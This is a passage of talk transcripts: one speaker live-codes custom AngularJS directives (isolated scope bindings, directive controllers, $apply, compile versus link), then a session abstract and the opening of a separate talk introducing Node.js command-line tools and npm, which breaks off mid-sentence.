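    transclude: true,          // lift the caller's content into the template
    templateUrl: 'alert.html', // the template contains an element with ng-transclude
    link: function (scope, element, attrs) {
      // Hard-coded for now; parameterizing the type comes next.
      element.addClass('alert alert-warning');
    }
  };
});
```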
Yeah, so the one thing that's a little bit off here, I believe, is that by default Angular throws my template inside the original element, which isn't quite what I want. What I want to do is replace that element. That looks better. So I'm replacing that original alert element that was in there. And let's parameterize this. How can I parameterize this? Well, the nice thing about attributes is that I can walk up to attrs and ask it, do you have something for type? And you might want to default it to something if it's not there. So you either specify a type or I'll default it to a type of info. And Bootstrap has a warning, info, error, something else too. Let's use that: alert dash plus the type. Save everything. Very good. Let's just check this out. If in index.html I say the type actually is warning or info, yeah. So it's a different color, the calm blue color, to let people know they shouldn't be concerned. And now what about the button click event? Well, before I write this, I'm going to tell you that the reason I'm writing this link function is just to demonstrate that inside of here you have access to the element and access to the attributes, and you can do anything you want to the DOM, read any of those attributes. But I have found that roughly 80% of the time I don't need to do this. I'll show you a better way in just a few minutes. For right now, I just want to show you that you can do things like element.find. So what I want to do is find the button somewhere inside of my element. And actually, if the button should just be standard everywhere, I'm not going to force the developer to put a button in every place. I'm going to include that in my template. So I'll put the button there and then transclude whatever other content they have. That should still work. I need to go and find that button. So find, again, is part of the jqLite API. But unlike jQuery, you cannot use just any selector inside of there. It won't let you select by class or ID or anything like that. You can only select by tag name, element name. If you need fancier DOM manipulation, you can use jQuery; if jQuery is loaded before Angular, Angular will use jQuery instead of its own jqLite implementation. Let's find the button. Let's say when someone clicks on it, I want to run the following function. And by the way, you don't have the usual .click or .mouseover methods; you have to use on with the jqLite API. Let's just do something really devastating: just remove the element from the DOM. See if this works. Refresh. And something went wrong. Oh, no. Something went wrong. My mouse didn't click correctly, I guess. If I click correctly, it goes away. So, questions so far? No, I can see everyone's fascinated. Or half asleep, I'm not sure which. Oh, yes. Is that the best practice? Is there a better way of doing it? With element.find and on, there is a better way to do it. I'm just demonstrating that you can do that inside of there. Yeah, let's do it a different way. One problem here is that once the type is set, it is always that type. So I'm going to show you a better way to do this, and along the way, I'll also show you how this could be a little more dynamic. Let's do this. Inside the alerts controller, I want to set up a scope.alert, some sort of data structure that says, here's the message I want to display to the user. This is a warning.
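Before it gets rewritten, the "do it all in the link function" version that was just demoed looks roughly like this as a sketch:

```javascript
angular.module('app').directive('alert', function () {
  return {
    restrict: 'EA',
    transclude: true,
    replace: true,             // replace the original <alert> element
    templateUrl: 'alert.html', // the template now includes the close button
    link: function (scope, element, attrs) {
      var type = attrs.type || 'info';      // default when no type is given
      element.addClass('alert alert-' + type);

      // jqLite find() only accepts tag names, which is fine for one button.
      element.find('button').on('click', function () {
        element.remove();
      });
    }
  };
});
```

Back in the demo, the scope.alert object being set up in the controller continues below.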
And the type of this is going to be a warning or maybe danger. So this is dangerous. Spelled something like that. And let's just use this to build our alerts. Over here in the main template, alert type equals, let me interpolate in alert.type. And let's replace this with message. And then I guess to make it really fancy, what I could do is add a button. ng-click equals changeAlert. Because what I want to do is make sure that this alert can respond to changes in the model. If someone changes the type or changes the message, I want that to make some visible difference in the page. If that makes sense. Does it make sense? OK. So over in the controller, let's add a scope.changeAlert. That is a function. So when the user clicks on this, we will say scope.alert.type equals info, and scope.alert.message... I could have just replaced the whole object, I guess. But we could say that was not a problem. Let's try this out. Refresh. I interpolated something wrong. Oh, right, right, right. Yeah, now we got a couple things going on. So in my index.html, it's alert.message. That's the problem. Thank you. Yes. I was hoping that part would work. So if I change the alert, notice that the text changed. So the data binding just works, even though it's in that transclusion. I just changed the message. It changed what was on the screen. But the color didn't change. I also changed the type to info. But because of the way our directive was written, it only read that type once and just stuck it in as a class. So now what I need to do is I start needing to, from inside of my directive, be bound to something from the outside world in a more explicit manner. Message already takes care of that in one sense for me, because that is using ng-bind. It's data binding into the page. But my alert type is not, because I have it read out once here and just throwing it in as an addClass. So here's what I want to do. I want to set up, sorry, before I do that, just one more thing I want to show you. What happens if we have two of these? Whoops, copy this and paste it. And here, instead of interpolating something, I'm just going to say, this is message two. This should drive home a good point. So now I have two instances of that directive on this page. And if I refresh and I click to close the first one, the second one disappears. This is mysterious behavior. If I click the second one, it goes away. Oh, and what happens if I keep clicking around? Well, oh, sorry, sorry, sorry, sorry. That was not working the way I expected it. I thought I was going to have a problem there. Well, ignore that part for right now. Let me do this. Sorry. What if I want to give my users the ability to respond to some type of alert and say, all right, I'm going to read what you type into here, and I'll treat that as the reason that this alert happened. Maybe I can demonstrate that behavior this way. Yeah, so that's a little bit better. What happens when I type into the first directive is that it appears in the second directive. Because by default, the scope object that I'm receiving is the same as the controller I'm inside of. So it's this object. And since both directives are writing into the reason property into that same scope object, this stuff shows up both places. The other way I could have seen this, I forgot, is if I would have tried to do something like scope.close equals a function. And what that function will do is element.remove. So I'm trying to get a little bit fancier and get rid of this find stuff.
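For reference, the controller side set up a moment ago looks roughly like this. The controller name is an assumption; the talk just calls it "the alerts controller".

```js
// An alert model on scope plus a function that mutates it, so we can watch
// whether the directive reacts to model changes.
angular.module('app')
  .controller('AlertsController', function ($scope) {
    $scope.alert = {
      message: 'This is a warning. This is dangerous.',
      type: 'warning'
    };

    $scope.changeAlert = function () {
      $scope.alert.type = 'info';
      $scope.alert.message = 'That was not a problem.';
    };
  });
```

In index.html this pairs with markup along the lines of `<alert type="{{alert.type}}">{{alert.message}}</alert>` and `<button ng-click="changeAlert()">change alert</button>`.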
I'm going to expose a close method on the scope object and tell it to remove an element. And I go into my alert.html. The other way I could have handled the close would be to say ng click equals close. See what that does. So I click on the first one, and the second one disappears. That time it happened, right? No? Yes? Yes. Yeah, I click on the first one. Second one goes away. Again, that's because these things are sharing the same scope object. So what is happening here is that when I write scope.close for the first directive on the screen, it grabs and forms a closure around the first directive element. And so if I were to just have one on the page, that would be fine. But the second instance comes along, rewrites that function, forms a closure around the second element. And that means it doesn't matter how many of these things I have here. I can only close the last one on the page. Does that make any sense? Maybe? I know it took a while for it to sink in for me. All right, so this is completely broken. I have all sorts of problems here. If I try to change an alert, things aren't updating. The color's not updating. If I try to close alerts, things aren't happening. What I really need to do is get away from using the same scope as my parent controller. What I want to do is create what's known as an isolated scope, which means my directive will get its own scope object. Things I put into it won't conflict with anything else. Just by writing that one line of code, well, three lines, but you could have put it on one line, just by isolating the directive like this. If I refresh and type in here, notice it doesn't appear in both anymore, because it's going into a reason property on that scope for the first directive instance. And this one is completely separate. But now, that fixes some problems. I'm not overwriting things. I should be able to close both of them now, so that part works. But I still need the ability to get the things to the outside world. I still need the ability to maybe, my controller wants to find out what this reason is. What did the user type inside of there? My controller might want to set messages independently. My controller might want to change the color still. So what we're going to do is look at a piece of Angular that honestly baffles a lot of people. We're going to look at how to set up binding between an isolated scope and the parent controller scope, or some expression that could represent anything. These isolated scopes, by the way. Usually, if you have a controller inside of a controller in Angular, the inner controller, its scope object prototypically inherits from the outer controller. It's not the case with directives. It doesn't matter where that directive is. It's isolated scope only prototypically inherits from root scope, which is the mother or the father of all scopes inside of an Angular application. But once you have one, which you do just by saying scope empty object, now you can start adding certain declarations inside of that isolated scope so that Angular will bind stuff to the outside world. So the first one we'll look at, well, we're going to look at three. We're going to look at at equals and ampersand. They are a way to form a bridge between some outer scope, a controller scope, root scope, somewhere, and an isolated directive scope. That's what these three things do. I want data from here to just automatically move into my isolated scope. And if I change it here, I want it automatically propagated back to my controller scope. That's the goal. 
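The fix for those shared-scope problems is that one line (well, three) of isolation. A sketch, with illustrative template markup:

```js
angular.module('app')
  .directive('alert', function () {
    return {
      restrict: 'E',
      transclude: true,
      replace: true,
      scope: {},   // isolated scope: this instance gets its own scope object
      template: '<div class="alert">' +
                '<button type="button" class="close" ng-click="close()">&times;</button>' +
                '<div ng-transclude></div>' +
                '</div>',
      link: function (scope, element, attrs) {
        // each instance now has its own close(), closing over its own element,
        // so two alerts on the same page no longer overwrite each other
        scope.close = function () {
          element.remove();
        };
      }
    };
  });
```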
Or I should say with an outside environment, because the first thing we'll look at, whoa, someone screwed up their animations there, is how to set the stage on fire. How can my scope reach out and grab an attribute value that is specified in the markup and keep things updated if that attribute value ever changes? That is the purpose of the at inside of an isolated scope. So when I say scope type is an at, that's telling Angular to automatically look for an attribute with the same name. It has to have the same name if I do it this way, type. And to take that value that is inside of it, info, and just automatically move it into that property of my scope object. So if I do this, I could say scope type attribute. I no longer need to do, I no longer need these attributes. I can get rid of them, whoops, but not the lower curly brace there. I don't need to read attributes anymore, because the attributes that I need, I can just move them in here. I could have as many of these as I want. So there could be a type, and there could be, you know, bind something called message as an attribute. But what this means is my scope will now have a type property. That type property will come from here. And for right now, let me get rid of the two alerts so it's not too confusing. That will come from here. Let me just hard code for a second, info, so we can see this working. And what I could do instead of that add class stuff inside of here, is also use some data binding out here and just say my class, I want it to be alert-type and interpolate it in. See if that works. Sorry. Yes, it's an info. So now let's try to wire it up dynamically. Instead of hard coding it, I want it to be alert.info. That's a problem. Typically, when you write an expression in Angular, like if you write an ng-model thing, you just write ng-model equals reason or ng-model equals alert.something. But when you do attribute binding, like so, Angular is always going to read out the string contents of the attribute directly. It's not going to try to treat this as some sort of expression to evaluate. Therefore, I always have to interpolate that with an explicit binding. So alert.info. And now if I come out here, it should. Whoops. Make sure I saved everything. It should. Should, should, should. Oh, sorry, what did I do? Oh, alert.type. Yes, it wouldn't have worked this way either without those. Just prove a point. Alert.type. And now if I change this alert, color changes too. So the attribute value changes that scope binding will automatically pull in the new value that gets placed in here and put it in, if that makes sense. All right, next thing I want to do is perhaps actually use this reason and try to get it out of that directive and into my controller or do some two-way data binding with it. And that is done with an equal. So if I say reason equals, what Angular is going to do is look for a reason attribute here and take this expression. So I don't need to interpolate it in anymore with the binding expressions. Take that expression and essentially set up a two-way data binding between that expression and my isolated scope. So if I change reason in the scope, it should automatically be pushed into whatever is specified here. And if anything is specified here or changes here in that expression, it should be pushed into my scope. In other words, let's come into our alert and let's start off with an initial reason, just say default reason, or please fill out anything like that. 
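Before moving on to the equals binding, here is the at-binding version of the directive as it stands. The scope declaration and template are a sketch of what was just typed.

```js
angular.module('app')
  .directive('alert', function () {
    return {
      restrict: 'E',
      transclude: true,
      replace: true,
      scope: {
        type: '@'   // pull the type attribute's (interpolated) string value into scope.type
                    // and keep it updated whenever that attribute value changes
      },
      // with the binding in place the class is data-bound in the template
      // instead of added imperatively in the link function
      template: '<div class="alert alert-{{type}}">' +
                '<div ng-transclude></div>' +
                '</div>'
    };
  });
```

Because the at binding always reads the attribute as a string, a dynamic value has to be interpolated in the markup, as in `<alert type="{{alert.type}}">{{alert.message}}</alert>`.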
And then what I want to do in my HTML is I want to tell my directive that the reason it should be looking at is alert.reason. So I want to set up that binding there. And in order for that to work in the directive itself, I will need to say reason equals. So two-way binding there. And now just check my template real quick. I do have this set up to be ngModel equals reason. Yeah, so refresh the page. And you can see default reason appears there because it's pulling out of that expression, and if I change it, we're not showing it, but it would be pushed back into the controller. Let's show it real quick. Over an index HTML outside of the directive, let me bind the reason. And what we could also do, when someone clicks to change the alert, I could say scope.alert.reason, just blank it out or something. So that's data moving from the controller scope into my directive. That's information being changed in my isolated scope of being pushed out to the controller scope. And again, change it in controller scope, it gets pushed back into my isolated scope. Really interesting stuff, isn't it? I think. Simple, anyway. Once you understand the crazy little shortcut syntax, which is ampersand and equals. So we're just saying, look for an attribute and take that expression, bind it to my scope. And finally, there's ampersand, which is basically a way of saying, I expect this to bind to something that I can invoke by applying parentheses. And that's going to stimulate some behavior in the outside world. I don't know what it's going to do. It could close something. It could navigate somewhere, make a web service call. All I know is that in my isolated scope, I'm going to have a member called close. And if I invoke it, something's going to happen. So as a directive developer, I may want to say, I'm not going to close things myself. What I'm going to do is expose this close member to you. So if you set up that expression, I promise to invoke it at the right point of time. And then you decide what to do out there in the controller somewhere. But it has to be called close. So in the markup, when I'm using this directive, I can say, oh, you gave me a close. Well, for close, what I will do is say, let's invoke something on my scope called close alert. And let me just set up one additional thing here. I could say that this should only show when alert is truthy. So the template does an ng click equals close. Where that's going to map to now when someone clicks on that close button is it's going to come into my directive. And because of this binding, say, yeah, we're going to invoke a function that was given to us, an expression that was given to us. The expression that was given to us was close alert. So now let me go off and look for close alert on this outer controller scope. So inside the controller, it is now responsible for the closing stuff. So scope.close alert, notice the name is different. What it could do is just something like scope.alert equals null. That would be falsey. And I think I did everything correctly. So if I click on the close button, because of ng show, then it just gets rid of everything. Questions? I see concerned looks. For this one. Yes. Yeah, this, and I was confused by this for a long, long time. And I think it's kind of unfortunate with Angular. Some directives, when you use them as an attribute like this, you specify an expression. 
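Pulling the three binding types together, a sketch of the directive plus the controller it now talks to; the message text and expression names follow the demo, everything else is illustrative.

```js
angular.module('app')
  .directive('alert', function () {
    return {
      restrict: 'E',
      transclude: true,
      replace: true,
      scope: {
        type: '@',     // string binding from the attribute
        reason: '=',   // two-way binding: reason="alert.reason" in the markup
        close: '&'     // expression binding: close="closeAlert()" in the markup
      },
      template: '<div class="alert alert-{{type}}">' +
                '<button type="button" class="close" ng-click="close()">&times;</button>' +
                '<div ng-transclude></div>' +
                '<input type="text" ng-model="reason" />' +
                '</div>'
    };
  })
  // the controller now owns the closing behavior the directive promises to invoke
  .controller('AlertsController', function ($scope) {
    $scope.alert = { message: 'Danger!', type: 'warning', reason: 'default reason' };
    $scope.closeAlert = function () {
      $scope.alert = null;   // falsey, so ng-show="alert" on the directive hides it
    };
  });
```

The markup that wires it all up looks something like `<alert type="{{alert.type}}" reason="alert.reason" close="closeAlert()" ng-show="alert">{{alert.message}}</alert>`.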
That is, if I type something in here like alert.type or alert.whatever, Angular is always, always, always going to treat that as an expression and something that has to be evaluated against scope. So that is telling Angular, because of the way ng-show is built, please go up to the current scope object and look for a property called alert. And if it's truthy, we show things. If it's falsey, we hide things. So inside of ng-show, I imagine they have something set up. Well, I won't pseudocode it. They could have an equals symbol there. They're doing model binding. But this one has to be interpolated, unfortunately, because my directive was written in such a way, where did it go, up the screen, to use this attribute binding instead of the model binding. And so that's saying, just pull something out of the attribute for me. And quite often, you might want to do that, because a lot of times, people are building these things, and they don't want to put something in the model to get a value there. They really do just want to say type equals info and be done with it. But if they do that, that's fine the way I have things set up with the at binding, but it's never going to be treated as an expression like this one. I need to say alert.type to make it dynamic and actually interpolate that into there. Confusing. And I used to get frustrated with it, actually. So I didn't know when to use double curlies and when to use an expression. So yeah, that's a good point. Just to go the other way, there are some directives like ng-include. This used to happen to me a lot. You would think, oh, ng-include, I just want to hard code a path here that says go to slash views slash partials slash login.html. Maybe a relative path. But ng-include treats this as an expression. So it walks up to your scope object and says, where's the views property? There is none. So this thing doesn't load. The way you treat this as a constant expression is to delicately place the single quotes around it so that the Angular parser says, oh, that's a string. So yeah, we go to views, partials, or whatever French word that is. You can get the login view. And I could do that here if I said type equals and used a single quote around this. If I refresh the page and look at the DOM, I imagine we'd see class equals squigglies alert dash type there. That's not what I want, though. Good so far. More questions? Because this, if we just go back and review the directive briefly, wasn't a whole lot of work. And in fact, I added some additional strange features in there to demonstrate different things. But it might have made for a slightly nicer user experience, developer experience, to be able to say, hey, I want to write things like this, alert type equals, and just have all of those things automatically closed and everything else done for me. So yeah, some people call directives, some people say that directives give you the ability to write a DSL in HTML. Yeah, that's one way to think of it. Let's talk about some plumbing now, some of the mysterious parts of directives. So you can, inside of a directive, also specify a controller. In other words, in my directive, I could say controller is a function that takes scope and element. It can also take services if it wants services. Or I could say controller equals ng alert controller, something like that, specify it in a separate file. Angular will find it and attach it to this. Question is, why would I want a controller? What would I do in a controller that I couldn't do in the link function?
Because we already saw the link function. You can attach events. You can manipulate the DOM. Controllers inside of a directive, to me, are good for two reasons. One is, if I have a lot of complicated logic or during calculations or manipulating scope, hopefully I won't do too much of that inside of a directive. But if I do, if I can pull that logic out of the linking function and into the controller, well, the controller is a separate, nice component that I can just instantiate in a unit test and fire some things off against the scope and write asserts. So it can often be easier to test a controller because it's just a function that modifies the scope. Easier to test that than link, which requires me to dig around with directives and do all sorts of other things. But the second reason to create a controller, which is quite often used inside of Angular itself, is to actually create an API for other directives to talk to each other. So if you create a controller for a directive and you create an API, not by adding things to scope, but by adding things to the controller object itself, so this dot and some function, inside of some other directive, you have the ability to tell Angular, hey, I have this alert directive. In order for me to work, I require some other directive as a sibling or as a parent. And I need to talk to the other controller so that I can tell it that certain things have happened inside of my alert. This happens all the time with ngModel and ngForm. I don't know how much Angular you've done or if you've done any form validation with Angular. But if I say form name equals editForm, form, in case you didn't know it, is an Angular directive. So literally, someone has written in Angular app.directive form because you can take control of just regular HTML elements. They don't have to be special. Well, and then inside of that form, I have an input type equals whatever, but it has an ngModel equals username, something like that. ngModel asks for the ngForm controller so that it has an object it can walk up to and say, someone just entered text into me, so consider yourself dirty. Or someone just wiped out all of the text inside of this input, and there's a required attribute here. So dear form, please consider ourselves invalid. And ngModel and ngForm have this communication back and forth because they look kind of like this. Let me show you an example using a slightly different project so I don't have to type out all the code. But let me start from here. Here's a slightly different alert. This one has an alert header directive nested inside of it. So if I look at the definition for this alert header, what I will find is that alert header says, hey, I require two controllers. This is a way to say that I require other directives to be in place. And again, it's a weird, goofy syntax. And it's an array, so it actually requires two things. First of all, this is saying I need a parent alert. That means I am so sorry about random jumping around. Let me close some windows so that I am always opening up the right window here. Start this again real quick. I require a parent alert. In other words, if alert header was not inside of an alert, there would be a problem because that one line of code says alert header, I need an alert to be a parent somewhere. Please give me a reference to that controller. And then I need my own controller to be passed into me. That will always pass because if you are an alert header and you need an alert header controller, it will just happen. 
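In code, the shape being described looks roughly like this; as the next part explains, the required controllers arrive in the link function. The click behavior and the modifyReason API are illustrative, following the talk's alert and alert header example.

```js
angular.module('app')
  .directive('alert', function () {
    return {
      restrict: 'E',
      controller: function ($scope) {
        // the API lives on the controller object itself (this), not on scope
        this.modifyReason = function (reason) {
          $scope.reason = reason;
        };
      }
      // ...template, transclude, scope bindings as before
    };
  })
  .directive('alertHeader', function () {
    return {
      restrict: 'E',
      // weird, goofy syntax: I require a parent alert, plus my own controller
      require: ['^alert', 'alertHeader'],
      controller: function () { /* alertHeader's own controller */ },
      link: function (scope, element, attrs, ctrls) {
        var alertCtrl = ctrls[0];          // first thing required, first thing passed in
        element.on('click', function () {
          scope.$apply(function () {       // native event, so wrap in $apply (more on that later)
            alertCtrl.modifyReason('header was clicked');
          });
        });
      }
    };
  });
```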
So the way this works is when you require other directives to be present, they will be passed in to this controller parameter, which is really controllers because it can be an array if you require multiple things. And the first thing in here will be the first thing you require. And the second thing in here will be the second thing that you require. So now inside of my linking function, I have access to two controllers that have an API. And when things happen, like a click event, I can walk up and invoke methods on those other controllers. This is not something we do in regular Angular outside of directives. You don't get references to other controllers and invoke things on them. But it happens with directives quite frequently because they're so bound to the DOM and they are the plumbing that makes things work. What is modify reason? Or look at modify reason on the alert controller. There's alert. It specified a controller of alert controller. So that's way up here. It provided an API for other things to call into it and modify something, tell it to do something. Let me show you another example. This is a little directive that I had to, sorry about that. Well, you might not be able to see it. This is a little directive I had to write because I wanted to be able to create an inline editable table. I wanted to be able to write TD with the content editable attribute, which is an HTML attribute, and then use ngModel so that I could actually push values between a table and something in my scope. And actually, to make this a little more concrete, I will flip around a little bit more and just show you something real quick, which is when I'm editing this report, I want to be able to come into, let's say, this name thing. And I want to create a table for the user where they can type in identifiers. That's interesting. Identifiers. Let's try it over here real quick. Here we go. So identify over there. I just want to do a little click on that and type. So what are these TD cells? These are TD cells with this content editable directive that you see right here. Unfortunately, if you put content editable and ngModel on a TD cell, it just doesn't magically work with Angular. ngModel doesn't exactly understand how to work with a TD cell. So I had to write a custom directive that basically says, sorry, whenever you see this attribute and you can get a hold of an ngModel controller, then what I want you to do is this. I want you to watch for any time the user basically types a key. And when that happens, I want you to read what is inside of the HTML and then maybe do some processing. But then this is the API that ngModel exposes through its controller. I'm telling ngModel, here is what is in the view. You call $viewValue on ngModel and it says, oh, that's what's in the view. OK, maybe I'll push that through onto the scope object. And that way I can get two-way data binding with this. Hopefully, that makes some sense. Here's the APIs provided by ngFormController and ngModel. How does ngModel tell the form that things are suddenly not clean or dirty anymore? Does that by calling methods when the user interacts with the page? And these are the properties that you can actually check to see if a form is valid or invalid or so forth. ngModel actually quite advanced behind the scenes. You can do things like set up formatters and parsers. So when I tell ngModel, here's a new thing from the view. It can have a collection of parsers that parse that value and turn strings into integers and things like that. 
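The contenteditable directive described here follows a well-known pattern with ngModelController, using its documented $setViewValue, $viewValue and $render members. This is a sketch under that assumption; the event choice and empty-value handling are illustrative.

```js
angular.module('app')
  .directive('contenteditable', function () {
    return {
      restrict: 'A',
      require: 'ngModel',   // hand me the ngModelController for this element
      link: function (scope, element, attrs, ngModelCtrl) {
        // view -> model: when the user types, tell ngModel what is now in the view
        element.on('keyup', function () {
          scope.$apply(function () {
            ngModelCtrl.$setViewValue(element.html());
          });
        });

        // model -> view: when the model changes, ngModel calls $render
        ngModelCtrl.$render = function () {
          element.html(ngModelCtrl.$viewValue || '');
        };
      }
    };
  });
```

Used on a table cell as something like `<td contenteditable ng-model="row.identifier"></td>`, which is exactly the inline-editable table scenario described above.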
And on the way back out, you can provide formatters to turn integers into, or, well, JavaScript doesn't have integers, to turn numbers into something with two digits after the decimal point or something like that. Hopefully, that is making sense. And yes, I'm zipping through this part of the presentation because this is the stuff that you might only need to know 10% of the time. You can get really far with directives just using the stuff that I showed you earlier. Remember to use $apply. So one of the common problems I see with directives is that you're using a directive because you want to integrate with some third party jQuery plugin that you like, or because there's an event that you need to capture that Angular doesn't already provide you a directive for. So you write something that uses element.on, hooks up to a native event, and when it happens, you start doing things that will change the scope. Angular doesn't know that that code is executing, so it doesn't do a digest phase and propagate changes unless you wrap things inside of a scope.$apply. Scope.$apply is the magic bit of telling Angular, hey, I'm about to do something that's going to change some scope values. So once I'm done, once you execute this function, the very next thing you probably want to do is look for anything that has changed so you can push new data into the view. Without scope.$apply, you can modify things and not see the result appear on the screen, which is very mysterious. So just remember Scott Allen told you, if you modify something and it doesn't appear and there's no errors in the developer tools, make sure you don't need a scope.$apply because you're doing something with native events like this. Watch is something that people will do from directives also. You want to set up a watch on some expression. So I want to watch something on my scope called text, perhaps. There's the same sort of thing for attributes with $observe. This allows you from inside of a directive to do something to the DOM element when a scope value changes. It's very useful. And yes, we're not on the summary just yet. Compile. What I'll tell you about compile is this. Compile is only useful if you are really trying to optimize a directive. So you're writing a directive that's going to be used by lots of people and lots of other developers on mobile devices, and it does a lot of DOM manipulation. That's when you want to use compile. Because here's what compile will do. When you have a directive like this, what Angular actually does first is look in your directive definition object to see if there is a compile. Because the first thing it would call on your directive definition object before anything else is that compile function. And it'll pass you the element in that compile function so that you can do any DOM modifications that you want. If I were doing a lot of DOM modifications inside of my directive, which I'm not, then I don't need to worry about compile. I can just write a link function, and that's fine. The big difference between compile and link is this. If you're inside of an ng-repeat, and that ng-repeat executes 10 times. So just to make this a little more concrete. Div ng-repeat equals in. Sorry? Oh, I already am in a repeat. Thank you. This is the other project. Show you how this works real quick. Run in browser. Run in browser. Control-shift-w. It was setting up a repeat, and I'll make this demo code available to you so you can add new alerts dynamically.
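A condensed reminder of the $apply, $watch and $observe points just made; the directive name and the behavior inside it are purely illustrative.

```js
angular.module('app')
  .directive('clickCounter', function () {
    return {
      link: function (scope, element, attrs) {
        // native event handler: Angular doesn't know this code runs,
        // so wrap the scope change in $apply to trigger a digest
        element.on('click', function () {
          scope.$apply(function () {
            scope.clicks = (scope.clicks || 0) + 1;
          });
        });

        // react to a scope value changing by touching the DOM
        scope.$watch('text', function (newValue) {
          element.text(newValue || '');
        });

        // $observe is the equivalent for interpolated attribute values
        attrs.$observe('title', function (value) {
          element.attr('title', value);
        });
      }
    };
  });
```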
But when you're inside of a repeat, if you have a link function that does DOM modifications for this element that you need to do before you place it into the screen, if you write those DOM modifications inside of a linking function, that will have to run 10 times and modify the DOM 10 times once for each time this alert appears, if there's 10 items in alerts. The reason to use compile is because what compile can do is if you can get away with doing your DOM modifications right here, they will happen only once. And then that element that you have modified and dressed up and massaged to look just the way you want it will be cloned and stamped out 10 times to fulfill that ng-repeat. That's really one of the only reasons to write compile. I want to do one DOM modification and then clone my element multiple times to get it into the page. And then when you write a compile, you return basically your linking function. That's the linking function that we wrote. So that is a bizarre piece of Angular. If you want to see some more details about that, I'm not pushing my blog or anything, but I did a recent post. And you can actually see I have debugging output that shows you exactly when they execute, exactly what the element is at each step of compile and link. But if you remember anything from this presentation, remember that I flipped around a lot. And remember that directives can be somewhat simple, but give you some nice benefits. And with that, I will say that I think that's all I have to tell you today. I hope you enjoy the rest of the conference. Any questions? I'll get this code available somewhere. And if you want to email me to get a copy of it, just let me know. Very quiet crowd. Everyone just went to coffee. Well, thank you for coming. Thank you.
|
Directives are a powerful feature of Angular and allow you to bring future web standards into the browser today. Directives are also intimidating at first because you need to know some magical incantations to make them work correctly and efficiently. In this session we’ll build some custom directives and see how to work with scope objects, linking functions, transclusions, and other features of directives that can transform your front end development.
|
10.5446/50865 (DOI)
|
Hello everyone. I said hello. Yes, there we go. Thanks for coming out to this session. It's a very tough time slot, but that's always the case at NDC, I guess. I wanted to give you a presentation that I wish someone had done for me at least 12 months ago, because it was about 12 months ago or maybe a little bit earlier than that when a couple people that I really respect said you should take a look at Node, because I've always been a web developer but primarily on the Microsoft stack, so even today I'm still building stuff with Visual Studio and C# and ASP.NET MVC and Web API. But they encouraged me to check out this environment, and so I started taking a look at Node, and of course at that point I had a perspective on Node that I think a lot of people might share, which is I thought Node was for building server-side web applications, web pages, web APIs, that type of thing. But what I found that I really liked about the Node environment were some of the tools that you can use that don't run on the server. They run at development time or they run at build time, and those are the things that I would like to walk you through, because starting about four months ago when I launched into a new project, I decided instead of using things that are available in Visual Studio or are available in ASP.NET MVC or available with Visual Studio plug-ins like Web Essentials, I was going to use Node tools instead, so I will show you some of those things. Why was I doing this? Because I was trying to start a new project that was slightly forward-looking and take advantage of specifications that are getting pretty solid right now, things like HTML5 and JavaScript, ECMAScript 5 and CSS3, but even pushing the edge just a little bit and looking at some of the newer APIs and ECMAScript 6 features that are coming out, I wanted to start taking advantage of those. And the problem in the Visual Studio environment is that Visual Studio has to support ASP.NET and JavaScript and things from all over the place, but when you look at the Node environment and you try to find out where are the cutting-edge tools being developed for the next version of HTML and the next version of JavaScript and all the new CSS things, it's all happening in the Node universe because Node executes JavaScript and there's a lot of JavaScript developers in that space and it is very friendly and open to open source, so a lot of people are building tools to work with the latest stuff. So let's first, just, I want to give you a really brief introduction to Node just in case you haven't seen it before. Yes, it runs on Windows, you just go to the website, you can click install, it will give you an MSI that you double click on to install it. It's only a 10 or 12 megabyte download. And this session is very noisy, isn't it? And what is Node, it is literally the same JavaScript engine that is inside of Chrome, but it is packaged into an executable so that you can run Node from the command prompt or from anywhere. And once you have it downloaded and you have installed it, let me first show you that you should have a Node.js command prompt. When you click that to open it, you will be in a command prompt where Node is in your path because it is then installed under Program Files somewhere. So you would be able to type Node and if that is all you do, you essentially get a REPL. So you can say what is 2 plus 2, that is 4.
What if I do var name equals scott, I get back undefined because the expression was assigned to a variable and there was nothing to compute there, but if I say name, yes, it is scott, if I say name.toUpperCase(), it is uppercase scott and there is even some auto completion help, if I type name. and hit tab, there is actually some introspection there that can tell me everything that I could do with a string, I could replace it, splice it, split it and things like that. So that is sort of interesting, just having a REPL, and actually I found that useful sometimes when I am trying to figure out things with like how a date behaves and I want to find what numbers are available on it and how to transform things into the proper time zone. But you can also, once I Ctrl+C to get out of here, create scripts that run in Node and now if I zoom out, what I should be able to do is say something like name equals scott, console.log name.toUpperCase(), kind of the same thing we had before but now this is saved into a script file called hello.js and I should just be able to run Node hello.js and spit out the same result. So yes, you can build web applications with Node and that is usually a process of downloading a framework and starting it up with Node, telling it to listen for HTTP messages on a specific port, but we are not going to look at the server stuff, we are going to look at things that actually run here in the command line so you can run them on your developer machine, run them on your build machine and there is lots of people creating command line tools that are built on top of Node. We are going to look at some of those but just to give you an idea of what you might be able to do is there is a tool out there to search Spotify that is built on top of Node that will come back and show you things from Michael Jackson and you could play one. The problem is that really only works on the MacBook, it doesn't work on my PC. Most things are going to work on Windows just as well as they work on the Mac but there is the occasional package that you might download for Node that only works on the MacBook because it is doing something special with hardware or a speaker or something like that. To understand how to get to those things, we are going to look at a Node package manager to pull down and install these tools. It is a lot like NuGet. In fact, we are going to look at several different package managers because there is a package manager for Node modules and Node tools that will download libraries and executables that run in Node and then there are package managers for client side stuff like how do I pull down the latest version of AngularJS or Bootstrap CSS. That is a different package manager that runs on top of Node. I will show you that one. There are task runners that you can download. Task runners are all about automation. Gone are the days when you would just write some JavaScript files and inject them into a browser page using some script tags. These days we write a lot of JavaScript and we want to lint the JavaScript, concatenate all the files together, minify it so it is a very small download. We might even want to do some transpiling so we want to go from CoffeeScript to JavaScript or we want to go from ECMAScript 6 and write the latest JavaScript but have it transpiled to ECMAScript 5 so it can actually run in the browsers that are available today.
We will basically be looking at setting up a JavaScript build process using two very generic task running tools and then there are generators out there. You want to do some scaffolding. You want to build up an application structure really quickly. I will show you a generator that is available. All of these things, the gateway to get to all of them is through a tool called NPM which is installed when you install Node so it should just be available. There is a tremendous amount of activity in the NPM repository which is where people will create an open source project to search Spotify, or minify JavaScript files and they will bundle things up into this Node package module, upload it into that repository and then you can install things. If you are familiar with NuGet, it is just like NuGet. I want to install a package. It is going to live in a specific location. I want to update all my packages. There is a way to just say, go out and update all the packages that I have installed for this project. In fact, there are, so NPM is a tool that you run from the command line. I can type NPM and it will bring up a help screen saying I can do things like install, I can do things like update and when I install things, there is a package manifest which I will show you that is a file that lists everything that I have installed for this particular project. Things are installed in one of two places. If I just type NPM install and some package name like Spotify to do that search, the default place will be in the directory that I am in under a subfolder called node_modules. Node really makes a distinction between two types of things that it downloads. Libraries that need to be referenced or included in some 